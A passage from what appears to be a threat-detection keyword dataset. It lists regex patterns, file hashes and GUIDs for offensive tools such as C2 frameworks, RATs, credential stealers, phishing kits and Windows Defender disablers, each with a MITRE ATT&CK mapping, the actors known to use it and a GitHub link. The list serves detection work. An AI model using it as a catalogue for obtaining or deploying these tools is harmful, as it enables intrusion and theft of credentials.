Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","39327" "*D Y N A S T Y - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","39328" 
"*D0:B6:9D:86:6D:AE:B4:E1:CA:F0:C1:F5:4D:82:45:7E:13:06:CD:1A:DE:49:A3:80:DC:21:6A:5C:A8:F4:84:1B*",".{0,1000}D0\:B6\:9D\:86\:6D\:AE\:B4\:E1\:CA\:F0\:C1\:F5\:4D\:82\:45\:7E\:13\:06\:CD\:1A\:DE\:49\:A3\:80\:DC\:21\:6A\:5C\:A8\:F4\:84\:1B.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#certificae #linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","39329" "*d00c00f1992a98fd03f1d19ec888e3931202b970fda01d59914275235cb0e4f5*",".{0,1000}d00c00f1992a98fd03f1d19ec888e3931202b970fda01d59914275235cb0e4f5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39332" "*D00C849B-4FA5-4E84-B9EF-B1C8C338647A*",".{0,1000}D00C849B\-4FA5\-4E84\-B9EF\-B1C8C338647A.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","39333" "*D00MFist/Mystikal*",".{0,1000}D00MFist\/Mystikal.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","39334" "*D00Movenok/HTMLSmuggler*",".{0,1000}D00Movenok\/HTMLSmuggler.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","39335" "*d013c82d6fa072f62559f257d81b72136dc33908494fdd1214c2c55dbf590a8b*",".{0,1000}d013c82d6fa072f62559f257d81b72136dc33908494fdd1214c2c55dbf590a8b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39336" "*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege 
Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39337" "*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39338" "*d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928*",".{0,1000}d01792b1ae73080ae4983d7d1016fd6927718b5c9543810b5daa9f2b75520928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39339" "*d0179fd6daffa7343ce3aebdfb00921c9a69e26cadc61d2f1514e8515c5119ce*",".{0,1000}d0179fd6daffa7343ce3aebdfb00921c9a69e26cadc61d2f1514e8515c5119ce.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","39340" 
"*d01dcb5cb218aa1cf3e7e942a101d371090db7dc7a29acdd905b0932e87c6668*",".{0,1000}d01dcb5cb218aa1cf3e7e942a101d371090db7dc7a29acdd905b0932e87c6668.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#filehash","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","39341" "*d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039*",".{0,1000}d02161cdc91cdee273f8b6e47f98a322756847ae3b5f4efe6d439fa5e13f9039.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39342" "*d027404d259a269dc52eb697868f7e91cd32888fc9659d1851441aaa9ea3b8bd*",".{0,1000}d027404d259a269dc52eb697868f7e91cd32888fc9659d1851441aaa9ea3b8bd.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","39343" 
"*d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36*",".{0,1000}d029b40b87bd1462c77138f017ab6914a3753c4ec47bcbf192231a6b2585cf36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39345" "*d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3*",".{0,1000}d0315c0ae104a656d1b6787f8929a324193f65935b54514107f9ddb7639784d3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39347" "*d03701f674555a2d9754d90179f2af83782a2f647e8f8c2355e8f8d7d9c84870*",".{0,1000}d03701f674555a2d9754d90179f2af83782a2f647e8f8c2355e8f8d7d9c84870.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39349" 
"*d03ed31e7d6b56b88203655622b4455767b43389fcee203370c6c292f7d37d7f*",".{0,1000}d03ed31e7d6b56b88203655622b4455767b43389fcee203370c6c292f7d37d7f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39350" "*d044393f7a9e9536cc03cec12137074d41dd338c0182bbd8a4ca165f79f5a3d9*",".{0,1000}d044393f7a9e9536cc03cec12137074d41dd338c0182bbd8a4ca165f79f5a3d9.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","39351" "*d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022*",".{0,1000}d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39354" "*d04cd33cbf5406ac9d9ecfef2276fa1188526125f52c01233542c701f624d7a5*",".{0,1000}d04cd33cbf5406ac9d9ecfef2276fa1188526125f52c01233542c701f624d7a5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","39355" 
"*d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750*",".{0,1000}d0659e8489bc633b617e86f4e7994a593ada5cfc8463f79631d9672623b79750.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39356" "*d0679dcc64ecf46c8ac74974a340e254ecd4a9fc4db26ccf43b94e2f71ff6eef*",".{0,1000}d0679dcc64ecf46c8ac74974a340e254ecd4a9fc4db26ccf43b94e2f71ff6eef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39357" "*d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068*",".{0,1000}d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","39358" "*d06bb0bbcc2307ccd8c36299b624fa84849fb3b525ec2321be8a1ed0ca88fe3e*",".{0,1000}d06bb0bbcc2307ccd8c36299b624fa84849fb3b525ec2321be8a1ed0ca88fe3e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - 
TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39359" "*d06ca6d1ef102f243774b1c4da1cabb414b015e7982c8eec3b54dbf728003248*",".{0,1000}d06ca6d1ef102f243774b1c4da1cabb414b015e7982c8eec3b54dbf728003248.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39360" "*d06d9e05ba5582691f8d5939cbbc37e171260c088a60770e2d45c27c9f1ac2ed*",".{0,1000}d06d9e05ba5582691f8d5939cbbc37e171260c088a60770e2d45c27c9f1ac2ed.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","39361" "*d071605c35f25451217ac8e22521b986d9b478e520abf91320ce39fda8b16c0a*",".{0,1000}d071605c35f25451217ac8e22521b986d9b478e520abf91320ce39fda8b16c0a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39362" "*d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab*",".{0,1000}d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive 
tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39363" "*d07bc5045b8309245debb4c48cf0854f3b43d24cc3b19618154645abe80129b4*",".{0,1000}d07bc5045b8309245debb4c48cf0854f3b43d24cc3b19618154645abe80129b4.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39366" "*d081972104ca7a2078d1335415bfc8b4c948bf8e79aa7b6ad70ae4a6d1353c00*",".{0,1000}d081972104ca7a2078d1335415bfc8b4c948bf8e79aa7b6ad70ae4a6d1353c00.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","39367" "*d081d04cfe16745774ef745354309ad25c38ebd8408128ead509c5f18938ec6a*",".{0,1000}d081d04cfe16745774ef745354309ad25c38ebd8408128ead509c5f18938ec6a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39368" "*d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff*",".{0,1000}d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39369" "*d085bf919dd44d0f756996237cc655eb5569ee00dc91ae02a7041ea369acc4c6*",".{0,1000}d085bf919dd44d0f756996237cc655eb5569ee00dc91ae02a7041ea369acc4c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39370" "*d08e48fbfffffa54fb689d612cfa21a1a0e906ade2bca23bd12f89ce827bc0df*",".{0,1000}d08e48fbfffffa54fb689d612cfa21a1a0e906ade2bca23bd12f89ce827bc0df.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","39372" "*d090bea299c6fb0956ce4a6450d0bfe1e3e0aa952a67b718f26e3668e41aac56*",".{0,1000}d090bea299c6fb0956ce4a6450d0bfe1e3e0aa952a67b718f26e3668e41aac56.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","39373" "*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*",".{0,1000}d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39374" "*d0979cde89fa887b2d61b7d225f433e96106d4735cb92069c84ccf69405aa74a*",".{0,1000}d0979cde89fa887b2d61b7d225f433e96106d4735cb92069c84ccf69405aa74a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source 
information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39375" "*d09ccee4-pass-word-0000-98677e2356fd*",".{0,1000}d09ccee4\-pass\-word\-0000\-98677e2356fd.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","39376" "*d0a3532c8dca1cb65fbdf7f28818eb5543a523c7eeebb8cfc838862518a96b51*",".{0,1000}d0a3532c8dca1cb65fbdf7f28818eb5543a523c7eeebb8cfc838862518a96b51.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39377" "*d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e*",".{0,1000}d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39380" "*d0a9150d-b6a4-4b17-a325-e3a24fed0aa9*",".{0,1000}d0a9150d\-b6a4\-4b17\-a325\-e3a24fed0aa9.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - 
Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#GUIDproject","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","39381" "*d0a965003f74317e82e25f5c479a66acb8048a470800be03f6cd8e413f5fd598*",".{0,1000}d0a965003f74317e82e25f5c479a66acb8048a470800be03f6cd8e413f5fd598.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","39382" "*d0aa252c1cf8232ad1fe5c59ac94962ba6d0790c333a960d3c757fb9a18f98d8*",".{0,1000}d0aa252c1cf8232ad1fe5c59ac94962ba6d0790c333a960d3c757fb9a18f98d8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39383" "*d0b6d53a899a02e580e7040a2c442ec872d3edc1c6d8eb4e82b95b0bf2e70943*",".{0,1000}d0b6d53a899a02e580e7040a2c442ec872d3edc1c6d8eb4e82b95b0bf2e70943.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","39385" 
"*d0c376cd617a39f0aae2ad7dd76c689025f894e3682c6e192ed6ff984ae81fd7*",".{0,1000}d0c376cd617a39f0aae2ad7dd76c689025f894e3682c6e192ed6ff984ae81fd7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39387" "*d0c384c27b210cefdf2e15e0b9a66a03e5a552af78f3e05bcbf5de5574b6f475*",".{0,1000}d0c384c27b210cefdf2e15e0b9a66a03e5a552af78f3e05bcbf5de5574b6f475.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39388" "*D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7*",".{0,1000}D0CBA7AF\-93F5\-378A\-BB11\-2A5D9AA9C4D7.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39390" "*D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7*",".{0,1000}D0CBA7AF\-93F5\-378A\-BB11\-2A5D9AA9C4D7.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39391" 
